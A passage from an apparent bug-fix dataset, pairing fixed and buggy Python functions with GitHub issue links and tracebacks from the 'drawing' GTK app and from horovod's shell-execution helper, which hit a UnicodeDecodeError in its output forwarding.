File "/usr/lib/python3/dist-packages/gi/module.py", line 137, in __getattr__
self.__name__, name))
AttributeError: 'gi.repository.Gtk' object has no attribute 'Template'
|
AttributeError
|
def set_compact(self, state): # TODO state as an int
if state:
self.main_menu_btn.set_menu_model(self.long_main_menu)
else:
self.main_menu_btn.set_menu_model(self.short_main_menu)
self.save_label.set_visible(not state)
self.save_icon.set_visible(state)
self.hidable_widget.set_visible(not state)
self.new_btn.set_visible(not state)
self.is_narrow = state
|
def set_compact(self, state):
if state:
self.main_menu_btn.set_menu_model(self.long_main_menu)
else:
self.main_menu_btn.set_menu_model(self.short_main_menu)
self.save_label.set_visible(not state)
self.save_icon.set_visible(state)
self.hidable_widget.set_visible(not state)
self.new_btn.set_visible(not state)
self.is_narrow = state
|
https://github.com/maoschanz/drawing/issues/70
|
Traceback (most recent call last):
File "/usr/bin/drawing", line 42, in <module>
from drawing import main
File "/usr/share/drawing/drawing/main.py", line 23, in <module>
from .window import DrawingWindow
File "/usr/share/drawing/drawing/window.py", line 40, in <module>
from .image import DrawingImage
File "/usr/share/drawing/drawing/image.py", line 31, in <module>
@Gtk.Template(resource_path='/com/github/maoschanz/drawing/ui/image.ui')
File "/usr/lib/python3/dist-packages/gi/overrides/__init__.py", line 39, in __getattr__
return getattr(self._introspection_module, name)
File "/usr/lib/python3/dist-packages/gi/module.py", line 137, in __getattr__
self.__name__, name))
AttributeError: 'gi.repository.Gtk' object has no attribute 'Template'
|
AttributeError
|
def _exec_middleman(command, env, exit_event, stdout, stderr, rw):
stdout_r, stdout_w = stdout
stderr_r, stderr_w = stderr
r, w = rw
# Close unused file descriptors to enforce PIPE behavior.
stdout_r.close()
stderr_r.close()
w.close()
os.setsid()
executor_shell = subprocess.Popen(
command, shell=True, env=env, stdout=stdout_w, stderr=stderr_w
)
# we don't bother stopping the on_event thread, this process sys.exits soon
# so the on_event thread has to be a daemon thread
on_event(
exit_event,
terminate_executor_shell_and_children,
args=(executor_shell.pid,),
daemon=True,
)
def kill_executor_children_if_parent_dies():
# This read blocks until the pipe is closed on the other side
# due to parent process termination (for any reason, including -9).
os.read(r.fileno(), 1)
terminate_executor_shell_and_children(executor_shell.pid)
in_thread(kill_executor_children_if_parent_dies)
exit_code = executor_shell.wait()
if exit_code < 0:
# See: https://www.gnu.org/software/bash/manual/html_node/Exit-Status.html
exit_code = 128 + abs(exit_code)
sys.exit(exit_code)
|
def _exec_middleman(command, env, exit_event, stdout, stderr, rw):
stdout_r, stdout_w = stdout
stderr_r, stderr_w = stderr
r, w = rw
# Close unused file descriptors to enforce PIPE behavior.
stdout_r.close()
stderr_r.close()
w.close()
os.setsid()
executor_shell = subprocess.Popen(
command, shell=True, env=env, stdout=stdout_w, stderr=stderr_w
)
# we don't bother stopping the on_event thread, this process sys.exits soon
# so the on_event thread has to be a deamon thread
on_event(
exit_event,
terminate_executor_shell_and_children,
args=(executor_shell.pid,),
daemon=True,
)
def kill_executor_children_if_parent_dies():
# This read blocks until the pipe is closed on the other side
# due to parent process termination (for any reason, including -9).
os.read(r.fileno(), 1)
terminate_executor_shell_and_children(executor_shell.pid)
in_thread(kill_executor_children_if_parent_dies)
exit_code = executor_shell.wait()
if exit_code < 0:
# See: https://www.gnu.org/software/bash/manual/html_node/Exit-Status.html
exit_code = 128 + abs(exit_code)
sys.exit(exit_code)
|
https://github.com/horovod/horovod/issues/2367
|
Tue Oct 13 10:54:25 2020[0]<stderr>:[10/13/2020 10:54:25 - INFO - __main__ - start running validation...
Tue Oct 13 10:54:25 2020[0]<stderr>: 0%| | 0/1327 [00:00<?, ?it/s]
Tue Oct 13 10:55:56 2020[0]<stderr>:
Exception in thread Thread-17:derr>: 65%|██████▌ | 866/1327 [01:17<00:47, 9.80it/s]
Traceback (most recent call last):
File "/data/anaconda3/envs/vcr/lib/python3.6/threading.py", line 916, in _bootstrap_inner
self.run()
File "/data/anaconda3/envs/vcr/lib/python3.6/threading.py", line 864, in run
self._target(*self._args, **self._kwargs)
File "/data/anaconda3/envs/vcr/lib/python3.6/site-packages/horovod/runner/common/util/safe_shell_exec.py", line 104, in forward_stream
text = text.decode('utf-8')
UnicodeDecodeError: 'utf-8' codec can't decode byte 0xe2 in position 999: unexpected end of data
Tue Oct 13 10:58:56 2020[3]<stderr>:[2020-10-13 10:58:56.365049: E /dockerdata/app/tmp/pip-install-998q9kn4/horovod/horovod/common/operations.cc:525] Horovod background loop uncaught exception: [/dockerdata/app/tmp/pip-install-998q9kn4/horovod/third_party/compatible_gloo/gloo/transport/tcp/unbound_buffer.cc:84] Timed out waiting 30000ms for recv operation to complete
Tue Oct 13 10:58:56 2020[2]<stderr>:[2020-10-13 10:58:56.366492: E /dockerdata/app/tmp/pip-install-998q9kn4/horovod/horovod/common/operations.cc:525] Horovod background loop uncaught exception: [/dockerdata/app/tmp/pip-install-998q9kn4/horovod/third_party/compatible_gloo/gloo/transport/tcp/unbound_buffer.cc:84] Timed out waiting 30000ms for recv operation to complete
Tue Oct 13 10:58:56 2020[1]<stderr>:[2020-10-13 10:58:56.366674: E /dockerdata/app/tmp/pip-install-998q9kn4/horovod/horovod/common/operations.cc:525] Horovod background loop uncaught exception: [/dockerdata/app/tmp/pip-install-998q9kn4/horovod/third_party/compatible_gloo/gloo/transport/tcp/unbound_buffer.cc:136] Timed out waiting 30000ms for send operation to complete
Tue Oct 13 10:58:56 2020[3]<stderr>:Traceback (most recent call last):
Tue Oct 13 10:58:56 2020[1]<stderr>:Traceback (most recent call last):
Tue Oct 13 10:58:56 2020[3]<stderr>: File "/data/anaconda3/envs/vcr/lib/python3.6/site-packages/horovod/torch/mpi_ops.py", line 622, in synchronize
Tue Oct 13 10:58:56 2020[2]<stderr>:Traceback (most recent call last):
Tue Oct 13 10:58:56 2020[3]<stderr>: mpi_lib.horovod_torch_wait_and_clear(handle)
Tue Oct 13 10:58:56 2020[2]<stderr>: File "/data/anaconda3/envs/vcr/lib/python3.6/site-packages/horovod/torch/mpi_ops.py", line 622, in synchronize
Tue Oct 13 10:58:56 2020[3]<stderr>:RuntimeError: Horovod has been shut down. This was caused by an exception on one of the ranks or an attempt to allreduce, allgather or broadcast a tensor after one of the ranks finished execution. If the shutdown was caused by an exception, you should see the exception in the log before the first shutdown message.
Tue Oct 13 10:58:56 2020[1]<stderr>: File "/data/anaconda3/envs/vcr/lib/python3.6/site-packages/horovod/torch/mpi_ops.py", line 622, in synchronize
Tue Oct 13 10:58:56 2020[3]<stderr>:
Tue Oct 13 10:58:56 2020[1]<stderr>: mpi_lib.horovod_torch_wait_and_clear(handle)
Tue Oct 13 10:58:56 2020[2]<stderr>: mpi_lib.horovod_torch_wait_and_clear(handle)
Tue Oct 13 10:58:57 2020[3]<stderr>:During handling of the above exception, another exception occurred:
Tue Oct 13 10:58:57 2020[2]<stderr>:RuntimeError: Horovod has been shut down. This was caused by an exception on one of the ranks or an attempt to allreduce, allgather or broadcast a tensor after one of the ranks finished execution. If the shutdown was caused by an exception, you should see the exception in the log before the first shutdown message.
Tue Oct 13 10:58:57 2020[1]<stderr>:RuntimeError: Horovod has been shut down. This was caused by an exception on one of the ranks or an attempt to allreduce, allgather or broadcast a tensor after one of the ranks finished execution. If the shutdown was caused by an exception, you should see the exception in the log before the first shutdown message.
Tue Oct 13 10:58:57 2020[3]<stderr>:
Tue Oct 13 10:58:57 2020[1]<stderr>:
Tue Oct 13 10:58:57 2020[2]<stderr>:
Tue Oct 13 10:58:57 2020[3]<stderr>:Traceback (most recent call last):
Tue Oct 13 10:58:57 2020[2]<stderr>:During handling of the above exception, another exception occurred:
Tue Oct 13 10:58:57 2020[1]<stderr>:During handling of the above exception, another exception occurred:
Tue Oct 13 10:58:57 2020[3]<stderr>: File "train_vcr.py", line 332, in <module>
Tue Oct 13 10:58:57 2020[1]<stderr>:
Tue Oct 13 10:58:57 2020[3]<stderr>: main(parse_cmd_args(TrainingOpts))
Tue Oct 13 10:58:57 2020[1]<stderr>:Traceback (most recent call last):
Tue Oct 13 10:58:57 2020[3]<stderr>: File "train_vcr.py", line 260, in main
Tue Oct 13 10:58:57 2020[1]<stderr>: File "train_vcr.py", line 332, in <module>
Tue Oct 13 10:58:57 2020[3]<stderr>: val_log = validate(model, val_dataloader)
Tue Oct 13 10:58:57 2020[1]<stderr>: main(parse_cmd_args(TrainingOpts))
Tue Oct 13 10:58:57 2020[3]<stderr>: File "/data/anaconda3/envs/vcr/lib/python3.6/site-packages/torch/autograd/grad_mode.py", line 49, in decorate_no_grad
Tue Oct 13 10:58:57 2020[1]<stderr>: File "train_vcr.py", line 260, in main
Tue Oct 13 10:58:57 2020[3]<stderr>: return func(*args, **kwargs)
Tue Oct 13 10:58:57 2020[1]<stderr>: val_log = validate(model, val_dataloader)
Tue Oct 13 10:58:58 2020[3]<stderr>: File "train_vcr.py", line 310, in validate
Tue Oct 13 10:58:58 2020[1]<stderr>: File "/data/anaconda3/envs/vcr/lib/python3.6/site-packages/torch/autograd/grad_mode.py", line 49, in decorate_no_grad
Tue Oct 13 10:58:57 2020[2]<stderr>:
Tue Oct 13 10:58:58 2020[3]<stderr>: qa_loss = sum(all_gather_list(qa_loss))
Tue Oct 13 10:58:58 2020[1]<stderr>: return func(*args, **kwargs)
Tue Oct 13 10:58:58 2020[2]<stderr>:Traceback (most recent call last):
Tue Oct 13 10:58:58 2020[1]<stderr>: File "train_vcr.py", line 310, in validate
Tue Oct 13 10:58:58 2020[2]<stderr>: File "train_vcr.py", line 332, in <module>
Tue Oct 13 10:58:58 2020[3]<stderr>: File "/data/cdp_algo_ceph_ssd/users/haoyanhuo/vcr/utils/distributed.py", line 233, in all_gather_list
Tue Oct 13 10:58:58 2020[2]<stderr>: main(parse_cmd_args(TrainingOpts))
Tue Oct 13 10:58:58 2020[3]<stderr>: max_size = hvd.allgather(torch.tensor([enc_size]).cuda()).max().item()
Tue Oct 13 10:58:58 2020[1]<stderr>: qa_loss = sum(all_gather_list(qa_loss))
Tue Oct 13 10:58:58 2020[2]<stderr>: File "train_vcr.py", line 260, in main
Tue Oct 13 10:58:58 2020[3]<stderr>: File "/data/anaconda3/envs/vcr/lib/python3.6/site-packages/horovod/torch/mpi_ops.py", line 365, in allgather
Tue Oct 13 10:58:58 2020[2]<stderr>: val_log = validate(model, val_dataloader)
Tue Oct 13 10:58:58 2020[3]<stderr>: return HorovodAllgather.apply(tensor, name)
Tue Oct 13 10:58:58 2020[1]<stderr>: File "/data/cdp_algo_ceph_ssd/users/haoyanhuo/vcr/utils/distributed.py", line 233, in all_gather_list
Tue Oct 13 10:58:58 2020[2]<stderr>: File "/data/anaconda3/envs/vcr/lib/python3.6/site-packages/torch/autograd/grad_mode.py", line 49, in decorate_no_grad
Tue Oct 13 10:58:58 2020[1]<stderr>: max_size = hvd.allgather(torch.tensor([enc_size]).cuda()).max().item()
Tue Oct 13 10:58:58 2020[3]<stderr>: File "/data/anaconda3/envs/vcr/lib/python3.6/site-packages/horovod/torch/mpi_ops.py", line 328, in forward
Tue Oct 13 10:58:59 2020[2]<stderr>: return func(*args, **kwargs)
Tue Oct 13 10:58:59 2020[3]<stderr>: return synchronize(handle)
Tue Oct 13 10:58:59 2020[2]<stderr>: File "train_vcr.py", line 310, in validate
Tue Oct 13 10:58:59 2020[3]<stderr>: File "/data/anaconda3/envs/vcr/lib/python3.6/site-packages/horovod/torch/mpi_ops.py", line 626, in synchronize
Tue Oct 13 10:58:59 2020[2]<stderr>: qa_loss = sum(all_gather_list(qa_loss))
Tue Oct 13 10:58:59 2020[3]<stderr>: raise HorovodInternalError(e)
Tue Oct 13 10:58:59 2020[2]<stderr>: File "/data/cdp_algo_ceph_ssd/users/haoyanhuo/vcr/utils/distributed.py", line 233, in all_gather_list
Tue Oct 13 10:58:59 2020[3]<stderr>:horovod.common.exceptions.HorovodInternalError: Horovod has been shut down. This was causedby an exception on one of the ranks or an attempt to allreduce, allgather or broadcast a tensor after one of the ranks finishedexecution. If the shutdown was caused by an exception, you should see the exception in the log before the first shutdown message.
Tue Oct 13 10:58:59 2020[1]<stderr>: File "/data/anaconda3/envs/vcr/lib/python3.6/site-packages/horovod/torch/mpi_ops.py", line 365, in allgather
Tue Oct 13 10:58:59 2020[2]<stderr>: max_size = hvd.allgather(torch.tensor([enc_size]).cuda()).max().item()
Tue Oct 13 10:58:59 2020[2]<stderr>: File "/data/anaconda3/envs/vcr/lib/python3.6/site-packages/horovod/torch/mpi_ops.py", line 365, in allgather
Tue Oct 13 10:58:59 2020[1]<stderr>: return HorovodAllgather.apply(tensor, name)
Tue Oct 13 10:58:59 2020[1]<stderr>: File "/data/anaconda3/envs/vcr/lib/python3.6/site-packages/horovod/torch/mpi_ops.py", line 328, in forward
Tue Oct 13 10:58:59 2020[2]<stderr>: return HorovodAllgather.apply(tensor, name)
Tue Oct 13 10:58:59 2020[2]<stderr>: File "/data/anaconda3/envs/vcr/lib/python3.6/site-packages/horovod/torch/mpi_ops.py", line 328, in forward
Tue Oct 13 10:58:59 2020[1]<stderr>: return synchronize(handle)
Tue Oct 13 10:58:59 2020[1]<stderr>: File "/data/anaconda3/envs/vcr/lib/python3.6/site-packages/horovod/torch/mpi_ops.py", line 626, in synchronize
Tue Oct 13 10:58:59 2020[2]<stderr>: return synchronize(handle)
Tue Oct 13 10:58:59 2020[1]<stderr>: raise HorovodInternalError(e)
Tue Oct 13 10:59:00 2020[2]<stderr>: File "/data/anaconda3/envs/vcr/lib/python3.6/site-packages/horovod/torch/mpi_ops.py", line 626, in synchronize
Tue Oct 13 10:59:00 2020[1]<stderr>:horovod.common.exceptions.HorovodInternalError: Horovod has been shut down. This was causedby an exception on one of the ranks or an attempt to allreduce, allgather or broadcast a tensor after one of the ranks finishedexecution. If the shutdown was caused by an exception, you should see the exception in the log before the first shutdown message.
Tue Oct 13 10:59:00 2020[2]<stderr>: raise HorovodInternalError(e)
Tue Oct 13 10:59:00 2020[2]<stderr>:horovod.common.exceptions.HorovodInternalError: Horovod has been shut down. This was causedby an exception on one of the ranks or an attempt to allreduce, allgather or broadcast a tensor after one of the ranks finishedexecution. If the shutdown was caused by an exception, you should see the exception in the log before the first shutdown message.
|
UnicodeDecodeError
|
def execute(
command,
env=None,
stdout=None,
stderr=None,
index=None,
events=None,
prefix_output_with_timestamp=False,
):
"""
Execute the given command and forward stdout and stderr of the command to the given
stdout and stderr text streams, or sys.stdout and sys.stderr, respectively, if None given.
Prefixes each line with index and timestamp if index is not None. The timestamp
can be disabled with prefix_output_with_timestamp set False.
The command will be terminated when any of the given events are set.
:param command: command to execute
:param env: environment variables to execute command with
:param stdout: stdout text stream, sys.stdout if None
:param stderr: stderr text stream, sys.stderr if None
:param index: index used to prepend text streams
:param events: events to terminate the command
:param prefix_output_with_timestamp: prepend text streams with timestamp if True
:return: command's exit code
"""
ctx = multiprocessing.get_context("spawn")
# When this event is set, signal to middleman to terminate its children and exit.
exit_event = _create_event(ctx)
# Make a pipe for the subprocess stdout/stderr.
(stdout_r, stdout_w) = ctx.Pipe()
(stderr_r, stderr_w) = ctx.Pipe()
# This Pipe is how we ensure that the executed process is properly terminated (not orphaned) if
# the parent process is hard killed (-9). If the parent (this process) is killed for any reason,
# this Pipe will be closed, which can be detected by the middleman. When the middleman sees the
# closed Pipe, it will issue a SIGTERM to the subprocess executing the command. The assumption
# here is that users will be inclined to hard kill this process, not the middleman.
(r, w) = ctx.Pipe()
middleman = ctx.Process(
target=_exec_middleman,
args=(
command,
env,
exit_event,
(stdout_r, stdout_w),
(stderr_r, stderr_w),
(r, w),
),
)
middleman.start()
# Close unused file descriptors to enforce PIPE behavior.
r.close()
stdout_w.close()
stderr_w.close()
# Redirect command stdout & stderr to provided streams or sys.stdout/sys.stderr.
# This is useful for Jupyter Notebook that uses custom sys.stdout/sys.stderr or
# for redirecting to a file on disk.
if stdout is None:
stdout = sys.stdout
if stderr is None:
stderr = sys.stderr
stdout_fwd = in_thread(
target=prefix_connection,
args=(stdout_r, stdout, "stdout", index, prefix_output_with_timestamp),
)
stderr_fwd = in_thread(
target=prefix_connection,
args=(stderr_r, stderr, "stderr", index, prefix_output_with_timestamp),
)
# TODO: Currently this requires explicitly declaration of the events and signal handler to set
# the event (gloo_run.py:_launch_jobs()). Need to figure out a generalized way to hide this behind
# interfaces.
stop = threading.Event()
events = events or []
for event in events:
on_event(event, exit_event.set, stop=stop, silent=True)
try:
middleman.join()
except:
# interrupted, send middleman TERM signal which will terminate children
exit_event.set()
while True:
try:
middleman.join()
break
except:
# interrupted, wait for middleman to finish
pass
finally:
stop.set()
stdout_fwd.join()
stderr_fwd.join()
return middleman.exitcode
|
def execute(
command,
env=None,
stdout=None,
stderr=None,
index=None,
events=None,
prefix_output_with_timestamp=False,
):
ctx = multiprocessing.get_context("spawn")
# When this event is set, signal to middleman to terminate its children and exit.
exit_event = _create_event(ctx)
# Make a pipe for the subprocess stdout/stderr.
(stdout_r, stdout_w) = ctx.Pipe()
(stderr_r, stderr_w) = ctx.Pipe()
# This Pipe is how we ensure that the executed process is properly terminated (not orphaned) if
# the parent process is hard killed (-9). If the parent (this process) is killed for any reason,
# this Pipe will be closed, which can be detected by the middleman. When the middleman sees the
# closed Pipe, it will issue a SIGTERM to the subprocess executing the command. The assumption
# here is that users will be inclined to hard kill this process, not the middleman.
(r, w) = ctx.Pipe()
middleman = ctx.Process(
target=_exec_middleman,
args=(
command,
env,
exit_event,
(stdout_r, stdout_w),
(stderr_r, stderr_w),
(r, w),
),
)
middleman.start()
# Close unused file descriptors to enforce PIPE behavior.
r.close()
stdout_w.close()
stderr_w.close()
# Redirect command stdout & stderr to provided streams or sys.stdout/sys.stderr.
# This is useful for Jupyter Notebook that uses custom sys.stdout/sys.stderr or
# for redirecting to a file on disk.
if stdout is None:
stdout = sys.stdout
if stderr is None:
stderr = sys.stderr
stdout_fwd = in_thread(
target=forward_stream,
args=(stdout_r, stdout, "stdout", index, prefix_output_with_timestamp),
)
stderr_fwd = in_thread(
target=forward_stream,
args=(stderr_r, stderr, "stderr", index, prefix_output_with_timestamp),
)
# TODO: Currently this requires explicitly declaration of the events and signal handler to set
# the event (gloo_run.py:_launch_jobs()). Need to figure out a generalized way to hide this behind
# interfaces.
stop = threading.Event()
events = events or []
for event in events:
on_event(event, exit_event.set, stop=stop, silent=True)
try:
middleman.join()
except:
# interrupted, send middleman TERM signal which will terminate children
exit_event.set()
while True:
try:
middleman.join()
break
except:
# interrupted, wait for middleman to finish
pass
finally:
stop.set()
stdout_fwd.join()
stderr_fwd.join()
return middleman.exitcode
|
https://github.com/horovod/horovod/issues/2367
|
Tue Oct 13 10:54:25 2020[0]<stderr>:[10/13/2020 10:54:25 - INFO - __main__ - start running validation...
Tue Oct 13 10:54:25 2020[0]<stderr>: 0%| | 0/1327 [00:00<?, ?it/s]
Tue Oct 13 10:55:56 2020[0]<stderr>:
Exception in thread Thread-17:derr>: 65%|██████▌ | 866/1327 [01:17<00:47, 9.80it/s]
Traceback (most recent call last):
File "/data/anaconda3/envs/vcr/lib/python3.6/threading.py", line 916, in _bootstrap_inner
self.run()
File "/data/anaconda3/envs/vcr/lib/python3.6/threading.py", line 864, in run
self._target(*self._args, **self._kwargs)
File "/data/anaconda3/envs/vcr/lib/python3.6/site-packages/horovod/runner/common/util/safe_shell_exec.py", line 104, in forward_stream
text = text.decode('utf-8')
UnicodeDecodeError: 'utf-8' codec can't decode byte 0xe2 in position 999: unexpected end of data
Tue Oct 13 10:58:56 2020[3]<stderr>:[2020-10-13 10:58:56.365049: E /dockerdata/app/tmp/pip-install-998q9kn4/horovod/horovod/common/operations.cc:525] Horovod background loop uncaught exception: [/dockerdata/app/tmp/pip-install-998q9kn4/horovod/third_party/compatible_gloo/gloo/transport/tcp/unbound_buffer.cc:84] Timed out waiting 30000ms for recv operation to complete
Tue Oct 13 10:58:56 2020[2]<stderr>:[2020-10-13 10:58:56.366492: E /dockerdata/app/tmp/pip-install-998q9kn4/horovod/horovod/common/operations.cc:525] Horovod background loop uncaught exception: [/dockerdata/app/tmp/pip-install-998q9kn4/horovod/third_party/compatible_gloo/gloo/transport/tcp/unbound_buffer.cc:84] Timed out waiting 30000ms for recv operation to complete
Tue Oct 13 10:58:56 2020[1]<stderr>:[2020-10-13 10:58:56.366674: E /dockerdata/app/tmp/pip-install-998q9kn4/horovod/horovod/common/operations.cc:525] Horovod background loop uncaught exception: [/dockerdata/app/tmp/pip-install-998q9kn4/horovod/third_party/compatible_gloo/gloo/transport/tcp/unbound_buffer.cc:136] Timed out waiting 30000ms for send operation to complete
Tue Oct 13 10:58:56 2020[3]<stderr>:Traceback (most recent call last):
Tue Oct 13 10:58:56 2020[1]<stderr>:Traceback (most recent call last):
Tue Oct 13 10:58:56 2020[3]<stderr>: File "/data/anaconda3/envs/vcr/lib/python3.6/site-packages/horovod/torch/mpi_ops.py", line 622, in synchronize
Tue Oct 13 10:58:56 2020[2]<stderr>:Traceback (most recent call last):
Tue Oct 13 10:58:56 2020[3]<stderr>: mpi_lib.horovod_torch_wait_and_clear(handle)
Tue Oct 13 10:58:56 2020[2]<stderr>: File "/data/anaconda3/envs/vcr/lib/python3.6/site-packages/horovod/torch/mpi_ops.py", line 622, in synchronize
Tue Oct 13 10:58:56 2020[3]<stderr>:RuntimeError: Horovod has been shut down. This was caused by an exception on one of the ranks or an attempt to allreduce, allgather or broadcast a tensor after one of the ranks finished execution. If the shutdown was caused by an exception, you should see the exception in the log before the first shutdown message.
Tue Oct 13 10:58:56 2020[1]<stderr>: File "/data/anaconda3/envs/vcr/lib/python3.6/site-packages/horovod/torch/mpi_ops.py", line 622, in synchronize
Tue Oct 13 10:58:56 2020[3]<stderr>:
Tue Oct 13 10:58:56 2020[1]<stderr>: mpi_lib.horovod_torch_wait_and_clear(handle)
Tue Oct 13 10:58:56 2020[2]<stderr>: mpi_lib.horovod_torch_wait_and_clear(handle)
Tue Oct 13 10:58:57 2020[3]<stderr>:During handling of the above exception, another exception occurred:
Tue Oct 13 10:58:57 2020[2]<stderr>:RuntimeError: Horovod has been shut down. This was caused by an exception on one of the ranks or an attempt to allreduce, allgather or broadcast a tensor after one of the ranks finished execution. If the shutdown was caused by an exception, you should see the exception in the log before the first shutdown message.
Tue Oct 13 10:58:57 2020[1]<stderr>:RuntimeError: Horovod has been shut down. This was caused by an exception on one of the ranks or an attempt to allreduce, allgather or broadcast a tensor after one of the ranks finished execution. If the shutdown was caused by an exception, you should see the exception in the log before the first shutdown message.
Tue Oct 13 10:58:57 2020[3]<stderr>:
Tue Oct 13 10:58:57 2020[1]<stderr>:
Tue Oct 13 10:58:57 2020[2]<stderr>:
Tue Oct 13 10:58:57 2020[3]<stderr>:Traceback (most recent call last):
Tue Oct 13 10:58:57 2020[2]<stderr>:During handling of the above exception, another exception occurred:
Tue Oct 13 10:58:57 2020[1]<stderr>:During handling of the above exception, another exception occurred:
Tue Oct 13 10:58:57 2020[3]<stderr>: File "train_vcr.py", line 332, in <module>
Tue Oct 13 10:58:57 2020[1]<stderr>:
Tue Oct 13 10:58:57 2020[3]<stderr>: main(parse_cmd_args(TrainingOpts))
Tue Oct 13 10:58:57 2020[1]<stderr>:Traceback (most recent call last):
Tue Oct 13 10:58:57 2020[3]<stderr>: File "train_vcr.py", line 260, in main
Tue Oct 13 10:58:57 2020[1]<stderr>: File "train_vcr.py", line 332, in <module>
Tue Oct 13 10:58:57 2020[3]<stderr>: val_log = validate(model, val_dataloader)
Tue Oct 13 10:58:57 2020[1]<stderr>: main(parse_cmd_args(TrainingOpts))
Tue Oct 13 10:58:57 2020[3]<stderr>: File "/data/anaconda3/envs/vcr/lib/python3.6/site-packages/torch/autograd/grad_mode.py", line 49, in decorate_no_grad
Tue Oct 13 10:58:57 2020[1]<stderr>: File "train_vcr.py", line 260, in main
Tue Oct 13 10:58:57 2020[3]<stderr>: return func(*args, **kwargs)
Tue Oct 13 10:58:57 2020[1]<stderr>: val_log = validate(model, val_dataloader)
Tue Oct 13 10:58:58 2020[3]<stderr>: File "train_vcr.py", line 310, in validate
Tue Oct 13 10:58:58 2020[1]<stderr>: File "/data/anaconda3/envs/vcr/lib/python3.6/site-packages/torch/autograd/grad_mode.py", line 49, in decorate_no_grad
Tue Oct 13 10:58:57 2020[2]<stderr>:
Tue Oct 13 10:58:58 2020[3]<stderr>: qa_loss = sum(all_gather_list(qa_loss))
Tue Oct 13 10:58:58 2020[1]<stderr>: return func(*args, **kwargs)
Tue Oct 13 10:58:58 2020[2]<stderr>:Traceback (most recent call last):
Tue Oct 13 10:58:58 2020[1]<stderr>: File "train_vcr.py", line 310, in validate
Tue Oct 13 10:58:58 2020[2]<stderr>: File "train_vcr.py", line 332, in <module>
Tue Oct 13 10:58:58 2020[3]<stderr>: File "/data/cdp_algo_ceph_ssd/users/haoyanhuo/vcr/utils/distributed.py", line 233, in all_gather_list
Tue Oct 13 10:58:58 2020[2]<stderr>: main(parse_cmd_args(TrainingOpts))
Tue Oct 13 10:58:58 2020[3]<stderr>: max_size = hvd.allgather(torch.tensor([enc_size]).cuda()).max().item()
Tue Oct 13 10:58:58 2020[1]<stderr>: qa_loss = sum(all_gather_list(qa_loss))
Tue Oct 13 10:58:58 2020[2]<stderr>: File "train_vcr.py", line 260, in main
Tue Oct 13 10:58:58 2020[3]<stderr>: File "/data/anaconda3/envs/vcr/lib/python3.6/site-packages/horovod/torch/mpi_ops.py", line 365, in allgather
Tue Oct 13 10:58:58 2020[2]<stderr>: val_log = validate(model, val_dataloader)
Tue Oct 13 10:58:58 2020[3]<stderr>: return HorovodAllgather.apply(tensor, name)
Tue Oct 13 10:58:58 2020[1]<stderr>: File "/data/cdp_algo_ceph_ssd/users/haoyanhuo/vcr/utils/distributed.py", line 233, in all_gather_list
Tue Oct 13 10:58:58 2020[2]<stderr>: File "/data/anaconda3/envs/vcr/lib/python3.6/site-packages/torch/autograd/grad_mode.py", line 49, in decorate_no_grad
Tue Oct 13 10:58:58 2020[1]<stderr>: max_size = hvd.allgather(torch.tensor([enc_size]).cuda()).max().item()
Tue Oct 13 10:58:58 2020[3]<stderr>: File "/data/anaconda3/envs/vcr/lib/python3.6/site-packages/horovod/torch/mpi_ops.py", line 328, in forward
Tue Oct 13 10:58:59 2020[2]<stderr>: return func(*args, **kwargs)
Tue Oct 13 10:58:59 2020[3]<stderr>: return synchronize(handle)
Tue Oct 13 10:58:59 2020[2]<stderr>: File "train_vcr.py", line 310, in validate
Tue Oct 13 10:58:59 2020[3]<stderr>: File "/data/anaconda3/envs/vcr/lib/python3.6/site-packages/horovod/torch/mpi_ops.py", line 626, in synchronize
Tue Oct 13 10:58:59 2020[2]<stderr>: qa_loss = sum(all_gather_list(qa_loss))
Tue Oct 13 10:58:59 2020[3]<stderr>: raise HorovodInternalError(e)
Tue Oct 13 10:58:59 2020[2]<stderr>: File "/data/cdp_algo_ceph_ssd/users/haoyanhuo/vcr/utils/distributed.py", line 233, in all_gather_list
Tue Oct 13 10:58:59 2020[3]<stderr>:horovod.common.exceptions.HorovodInternalError: Horovod has been shut down. This was causedby an exception on one of the ranks or an attempt to allreduce, allgather or broadcast a tensor after one of the ranks finishedexecution. If the shutdown was caused by an exception, you should see the exception in the log before the first shutdown message.
Tue Oct 13 10:58:59 2020[1]<stderr>: File "/data/anaconda3/envs/vcr/lib/python3.6/site-packages/horovod/torch/mpi_ops.py", line 365, in allgather
Tue Oct 13 10:58:59 2020[2]<stderr>: max_size = hvd.allgather(torch.tensor([enc_size]).cuda()).max().item()
Tue Oct 13 10:58:59 2020[2]<stderr>: File "/data/anaconda3/envs/vcr/lib/python3.6/site-packages/horovod/torch/mpi_ops.py", line 365, in allgather
Tue Oct 13 10:58:59 2020[1]<stderr>: return HorovodAllgather.apply(tensor, name)
Tue Oct 13 10:58:59 2020[1]<stderr>: File "/data/anaconda3/envs/vcr/lib/python3.6/site-packages/horovod/torch/mpi_ops.py", line 328, in forward
Tue Oct 13 10:58:59 2020[2]<stderr>: return HorovodAllgather.apply(tensor, name)
Tue Oct 13 10:58:59 2020[2]<stderr>: File "/data/anaconda3/envs/vcr/lib/python3.6/site-packages/horovod/torch/mpi_ops.py", line 328, in forward
Tue Oct 13 10:58:59 2020[1]<stderr>: return synchronize(handle)
Tue Oct 13 10:58:59 2020[1]<stderr>: File "/data/anaconda3/envs/vcr/lib/python3.6/site-packages/horovod/torch/mpi_ops.py", line 626, in synchronize
Tue Oct 13 10:58:59 2020[2]<stderr>: return synchronize(handle)
Tue Oct 13 10:58:59 2020[1]<stderr>: raise HorovodInternalError(e)
Tue Oct 13 10:59:00 2020[2]<stderr>: File "/data/anaconda3/envs/vcr/lib/python3.6/site-packages/horovod/torch/mpi_ops.py", line 626, in synchronize
Tue Oct 13 10:59:00 2020[1]<stderr>:horovod.common.exceptions.HorovodInternalError: Horovod has been shut down. This was causedby an exception on one of the ranks or an attempt to allreduce, allgather or broadcast a tensor after one of the ranks finishedexecution. If the shutdown was caused by an exception, you should see the exception in the log before the first shutdown message.
Tue Oct 13 10:59:00 2020[2]<stderr>: raise HorovodInternalError(e)
Tue Oct 13 10:59:00 2020[2]<stderr>:horovod.common.exceptions.HorovodInternalError: Horovod has been shut down. This was causedby an exception on one of the ranks or an attempt to allreduce, allgather or broadcast a tensor after one of the ranks finishedexecution. If the shutdown was caused by an exception, you should see the exception in the log before the first shutdown message.
|
UnicodeDecodeError
|
def write(text):
if index is not None and prefix is not None:
context = get_context(index, prefix)
dst_stream.write(context)
dst_stream.write(text)
dst_stream.flush()
|
def write(text):
if index is not None:
text = prepend_context(text, index, prefix)
dst_stream.write(text)
dst_stream.flush()
|
https://github.com/horovod/horovod/issues/2367
|
